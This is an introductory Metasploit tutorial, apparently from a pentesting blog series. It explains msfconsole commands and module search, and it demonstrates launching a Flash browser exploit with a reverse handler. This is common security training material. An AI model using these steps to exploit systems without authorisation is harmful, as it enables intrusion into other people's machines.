Metasploit is the world’s leading exploitation framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.
Originally developed by HD Moore as an open-source project, it is now owned by the security company, Rapid7 (Rapid7 also owns the vulnerability scanner, Nexpose). Although originally developed as an open-source project, Rapid7 has now developed a Pro version of Metasploit with a few more “bells and whistles”. Fortunately, the open-source, community-edition is still available to the rest of us without the tens of thousands of dollars to spend on the Pro version (if you are a professional pentester, the efficiency and time savings accrued in using the Pro version make it a good investment).
Metasploit has multiple interfaces including;
(1) msfconsole – an interactive command-line like interface
(2) msfcli – a literal Linux command line interface
(3) Armitage – a GUI-based third party application
(4) msfweb – browser based interface
Undoubtedly, the most common way to use Metasploit is through Metasploit’s own interactive shell, msfconsole. In this tutorial, we will be largely using this msfconsole, but I will show you how to use the others in later tutorials.
In recent years, Metasploit has integrated additional tools to make it more than just a exploitation framework. Tools, such as nmap and Nexpose, are now integrated into Metasploit, so that the entire process of from port scanning, vulnerability scanning, exploitation and post-exploitation, can all be done from one single tool. In addition, Metasploit has now integrated a postgresql database to store the data collected from your scans and exploits.
II. Getting Started
Before we start Metasploit, we should start the postgresql database. Metasploit will work without postgresql, but this database enables Metasploit to run faster searches and store the information you collect while scanning and exploiting.
Start the postgresql database before starting Metasploit by typing;
kali > service postgresql start
Once the database has been started, you can start the Metasploit Framework console by typing;
As Metasploit loads everything into RAM, it takes awhile, so be patient. Eventually, you should get a screen that looks like this.
Don’t worry if it doesn’t look exactly the same as my screen above as Metasploit rotates the opening splash images. As long as you have the msf >prompt, you are in the right place.
This starts the Metasploit console. If you are more GUI oriented, you can go Applications–>Exploitation Tools–> metasploit framework.
III. Metasploit Keywords
Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.
Metasploit has six (6) types of modules;
A word about terminology though before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to place a payload on the system. This payload can be a simple command shell or the all powerful Meterpreter. In other environments these payloads might be termed listeners or rootkits. I will do a tutorial on each of these types of modules in the near future.
Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.
msf > help
Note that we can access this help menu with the “?” as well as “help”.
msf > use
The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would type;
msf > use exploit/windows/browser/adobe_flash_avm2
As you can see above, when Metasploit successfully loads the module, it responds with the type of module (exploit) and the abbreviated module name in red.
After you load a module, the show command can be very useful to gather more information on the module. The three “show” commands I use most often are “show options”, “show payloads” and “show targets”. Let’s take a look at “show payloads” first.
msf > show payloads
This command, when used after selecting your exploit, will show you all the payloads that are compatible with this exploit. If you run this command before selecting an exploit, it will show you ALL payloads, a VERY long list.
As you see in the screenshot above, the show payloads command listed all the payloads that will work with this exploit.
msf > show options
This command is also very useful in running an exploit. It will display all of the options that need to set before running the module. These options include such things as IP addresses, URI path, the port, etc.
msf > show targets
A less commonly used command is “show targets”. Each exploit has a list of the targets it will work against. By using the “show targets” command, we can get a list of them. In this case, targeting is automatic, but some exploits have as many as 100 different targets and success will often depend upon selecting the correct one. These targets can be defined by operating system, service pack and language, among other things.
msf > info
The info command is simple. When you type it after you have selected a module, it shows you key information about the module, including the options that need to be set, the amount of payload space (more about this in the payloads section), and a description of the module. I usually always run it after selecting my exploit.
msf > search
As a newcomer to Metasploit, the “search” command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic. Rapid7 added the search function starting with version 4 and it has become a time- and life-saver.
Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.
To be more specific in your search, you can use the following keywords.
platform – this is the operating system that the module is built for
type – this is the type of module. These include exploits, nops, payloads, post, encoders and auxiliary
name – if you know the name of the module you can search by its name
The syntax for using search is the keyword followed by a colon and then a value such as;
msf > search type:exploit
For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;
msf > search type:exploit platform:windows flash
As you can see above, Metasploit searched it’s database for modules that were exploits for the Windows platform and included the keyword “flash”.
msf > set
This command is use to set options within the module you selected. For instance, if we look above at the show options command, we can see numerous options that must set such as URIPATH, SVRHOST and SVRPORT. We can set any of these with the set command such as;
msf > set SRVPORT 80
This changes the default SVRPORT (server port) from 8080 to 80.
msf > unset
This command, as you might expect, unsets the option that was previously set. Such as;
msf > unset SRVPORT
As you can see, we first set the SRVPORT variable to 80 and then unset it. It then reverted back to the default value of 8080 that we can see when we typed show options again.
msf > exploit
Once we have loaded our exploit and set all the necessary options, the final action is “exploit”. This sends the exploit to the target system and, if successful, installs the payload.
As you can see in this screenshot, the exploit starts and is running as background job with a reverse handler on port 4444. It then started a webserver on host 0.0.0.0 on port 80 with a randomized URL (F5pmyl9gCHVGw90). We could have chosen a specific URL and set it by changing the URIPATH variable with the set command.
msf > back
We can use the back command to take us “back” one step in our process. So, if you instance, we decided that we did not want to use the adobe/flash/avm2 exploit, we could type “back” and it would remove the loaded exploit.
msf > exit
The exit command, as you would expect, exits us from the msfconsole and back into the BASH command shell.
Notice that in this case, it stops the webserver that we created in this exploit and returned us to the Kali command prompt in the BASH shell.
In many exploits, you will see the following options (variables).
RHOST – this is the remote host or target IP
LHOST – this is the local host or attacker IP
RPORT – this is the remote port or target port
LPORT – this is the local port or attacker port
These can all be set, by using the SET command followed by the variable name (RHOST, for instance) and then the value.
msf > SET RHOST 126.96.36.199
Although this is less than an exhaustive list of Metasploit commands, with just these commands you should be able to execute most of the functions in Metasploit. When you need another command in this course, I will take a few minutes to introduce it, but these are all you will likely need, for now.